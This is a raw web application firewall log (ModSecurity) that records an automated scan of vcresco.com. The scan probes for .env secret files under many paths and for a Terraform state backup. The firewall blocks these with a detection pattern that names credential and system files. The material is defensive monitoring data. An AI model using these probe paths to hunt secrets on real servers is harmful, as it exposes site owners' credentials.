[Tue May 26 13:04:05.327469 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CVQAAFC0"]
[Tue May 26 13:04:05.339091 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CXwAAAD8"]
[Tue May 26 13:04:05.339606 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CYAAAFHw"]
[Tue May 26 13:04:05.427097 2026] [security2:error] [pid 470766:tid 470816] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/staging/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CYwAADzE"]
[Tue May 26 13:04:05.451544 2026] [security2:error] [pid 470766:tid 470802] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stg/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CbgAASCM"]
[Tue May 26 13:04:05.465738 2026] [security2:error] [pid 470766:tid 470880] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stripe/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CdQAASHE"]
[Tue May 26 13:04:05.471988 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CawAASF8"]
[Tue May 26 13:04:05.477448 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CagAASHA"]
[Tue May 26 13:04:05.484096 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CbQAASEU"]
[Tue May 26 13:04:05.491572 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CbAAASDw"]
[Tue May 26 13:04:05.493526 2026] [security2:error] [pid 470766:tid 470807] [remote 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CcQAASCg"]
[Tue May 26 13:04:05.494659 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CbwAASEM"]
[Tue May 26 13:04:05.496172 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CcwAASCc"]
[Tue May 26 13:04:05.496525 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CcAAASDY"]
[Tue May 26 13:04:05.508094 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CeAAASAA"]
[Tue May 26 13:04:05.513874 2026] [security2:error] [pid 470766:tid 470913] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CeQAAABE"]
[Tue May 26 13:04:05.514022 2026] [security2:error] [pid 470766:tid 471013] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CegAAAHU"]
[Tue May 26 13:04:05.556729 2026] [security2:error] [pid 470766:tid 470936] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CPgAAACg"]
[Tue May 26 13:04:05.560504 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CggAAAAE"]
[Tue May 26 13:04:05.561071 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CgwAAAH8"]
[Tue May 26 13:04:05.614966 2026] [security2:error] [pid 470766:tid 470947] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4ChgAAADM"]
[Tue May 26 13:04:05.617395 2026] [security2:error] [pid 470766:tid 470811] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVM7ejO_W1DqEcFHQ4CjQAATSw"]
[Tue May 26 13:04:05.639310 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CiQAAAGw"]
[Tue May 26 13:04:05.640524 2026] [security2:error] [pid 470766:tid 470884] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/test.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4ClAAATXU"]
[Tue May 26 13:04:05.641492 2026] [security2:error] [pid 470766:tid 470803] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/test/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4ClQAATSQ"]
[Tue May 26 13:04:05.662823 2026] [security2:error] [pid 470766:tid 470973] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CkQAATTA"]
[Tue May 26 13:04:05.673030 2026] [security2:error] [pid 470766:tid 471006] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CkwAAAG4"]
[Tue May 26 13:04:05.673592 2026] [security2:error] [pid 470766:tid 470883] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/user/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CpAAATXQ"]
[Tue May 26 13:04:05.686243 2026] [security2:error] [pid 470766:tid 470991] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CoAAAAF8"]
[Tue May 26 13:04:05.689646 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CnAAAAEk"]
[Tue May 26 13:04:05.690673 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CnwAAAEA"]
[Tue May 26 13:04:05.707281 2026] [security2:error] [pid 470766:tid 470819] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v1/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CqgAATTQ"]
[Tue May 26 13:04:05.714059 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CqAAAAFQ"]
[Tue May 26 13:04:05.718806 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CqQAAAGk"]
[Tue May 26 13:04:05.750346 2026] [security2:error] [pid 470766:tid 470939] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CrQAAACs"]
[Tue May 26 13:04:05.763960 2026] [security2:error] [pid 470766:tid 470843] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v2/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CrgAAb0w"]
[Tue May 26 13:04:05.784196 2026] [security2:error] [pid 470766:tid 470856] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v3/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CrwAAI1k"]
[Tue May 26 13:04:05.830456 2026] [security2:error] [pid 470766:tid 470956] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CtgAAADw"]
[Tue May 26 13:04:05.834559 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CtAAAYF0"]
[Tue May 26 13:04:05.839565 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CtQAAAGg"]
[Tue May 26 13:04:05.842412 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CuQAAAFI"]
[Tue May 26 13:04:05.851231 2026] [security2:error] [pid 470766:tid 471009] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CwQAAAHE"]
[Tue May 26 13:04:05.856602 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CxQAAYAI"]
[Tue May 26 13:04:05.860399 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CyQAAABQ"]
[Tue May 26 13:04:05.875658 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CzAAAYAc"]
[Tue May 26 13:04:05.893559 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C1AAAYCI"]
[Tue May 26 13:04:05.894968 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C1QAAYAw"]
[Tue May 26 13:04:05.898121 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C2AAAAEs"]
[Tue May 26 13:04:05.900508 2026] [security2:error] [pid 470766:tid 470922] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C1gAAABo"]
[Tue May 26 13:04:05.904418 2026] [security2:error] [pid 470766:tid 470994] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C1wAAAGI"]
[Tue May 26 13:04:05.959126 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C3QAAYGU"]
[Tue May 26 13:04:05.961494 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C3gAAAH8"]
[Tue May 26 13:04:05.973957 2026] [security2:error] [pid 470766:tid 470993] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C3wAAAGE"]
[Tue May 26 13:04:05.976707 2026] [security2:error] [pid 470766:tid 470853] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/var/www/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4C4gAAClY"]
[Tue May 26 13:04:05.979230 2026] [security2:error] [pid 470766:tid 470865] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/var/www/html/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4C5AAAM2I"]
[Tue May 26 13:04:06.013762 2026] [security2:error] [pid 470766:tid 470871] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/web/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4C7AAAUWg"]
[Tue May 26 13:04:06.041042 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C6AAAUWc"]
[Tue May 26 13:04:06.042299 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C7gAAUVM"]
[Tue May 26 13:04:06.050635 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C7wAAADA"]
[Tue May 26 13:04:06.051356 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C8AAAUVU"]
[Tue May 26 13:04:06.052826 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C7QAAUWE"]
[Tue May 26 13:04:06.071099 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C8gAAUVc"]
